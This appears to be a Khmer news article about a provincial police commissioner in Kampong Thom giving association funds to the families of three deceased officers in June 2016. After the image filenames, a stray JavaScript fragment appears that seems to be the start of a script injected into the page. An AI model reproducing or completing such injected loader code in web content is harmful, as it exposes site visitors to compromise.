ព្រឹតិ្តការណ៍ថ្មីៗ

ស្នងការនគរបាលខេត្តកំពង់ធំប្រគល់ថវិការសមាគមន៍មិត្តនគរបាលជូនគ្រួសារសព

1 ឆ្នាំ មុន 1 វិជ្ជា ស្លាប់រស់ជារឿងធម្មតា​

 

ខេត្តកំពង់ធំ ៖ ថវិការសមាគមន៍មិត្ត នគរបាលជាតិ ចំនួន១២លានរៀល ត្រូវបានប្រគល់ជូន ដល់គ្រួសារយុទ្ធពលី ចំនួន០៣នាក់ នៅព្រឹកថ្ងៃទី ០៧ ខែ មិថុនា ឆ្នាំ២០១៦នេះ ដែលពិធីនេះធ្វើឡើង នៅក្នុងសាលប្រជុំគណៈស្នងការដ្ឋាន ខេត្តកំពង់ធំ ។

 

លោកឧត្តម សេនីយ៏ត្រី ជូ សំអាន ស្នងការដ្ឋាននគរបាលខេត្ត មានប្រសាន៏ថា ក្នុងនាមស្នងការនគរបាលខេត្ត តំណាងឲ្យមន្ត្រីនគរបាល ទូរទាំងខេត្តកំពង់ធំ សូមចូលរួមចំណែក រំលែកទុក្ខ ជាមួយនិង បងប្អូនជាគ្រួសារនៃសព ដែលបានលះបង់ប្តី-ប្រពន្ធ ចូលបម្រើជានគរបាលជាតិ ដើម្បីការពារសន្តិសុខ សុវត្ថិភាព និង សណ្តាប់ធ្នាប់ ជូនប្រជាពលរដ្ឋ ក៏ដូចជាប្រទេសជាតិ របស់យើង រហូតដល់ពលីជីវិត ក្នុងបុព្វហេតុជាតិ និងមាតុភូមិ ។

 

អាស្រ័យហេតុដូច្នេះហើយ បានជារាជរដ្ឋភិបាលយើង លោកមិនដែលបំភ្លេច នូវគុណនូប្បក្ការៈ របស់យុទ្ធជនយុទ្ធនារី របស់យើងនោះឡើយ ចំពោះថវិការដែលនាំមក នៅថ្ងៃនេះ មានចំនួន១២លានរៀល សម្រាប់ប្រគល់ជូន ដល់ក្រុមគ្រសារ ដែលបានទទួលមរណៈភាព រួមមានៈ ១.គ្រួសាររបស់ លោកវរៈសេនីយ៏ត្រី ប៊ុន សារ៉ុម អធិការ រងនគរបាលក្រុងស្ទឹងសែន ទី២.គ្រួសារសព របស់លោក អនុសេនីយ៏ទោ សំ ឈាក និងទី៣.គ្រួសារសព របស់លោកអនុសេនីយ៏ត្រី ហ៊ីង ហុន ដោយក្នុង១គ្រួសារៗ ទទួលបានថវិការ ចំនួន៤លានរៀល ។

 

បន្ទាប់ពីបានទទួលថវិការទាំងអស់នេះហើយ លោកស្នងការបានផ្តាំផ្ញើថា សូមយកទៅចាយវាយឲ្យ ចំគោលដៅ ដើម្បីជួយសម្រួល ដល់ជីវីភាពក្នុងគ្រួសារ ព្រមទាំងកូនៗដែលកំពុងតែសិក្សា ៕

IMG-20160607-WA0077 IMG-20160607-WA0076 IMG-20160607-WA0075var d=document;var s=d.createElement(‘script’);

បន្ថែមយោបល់របស់អ្នក

យោបល់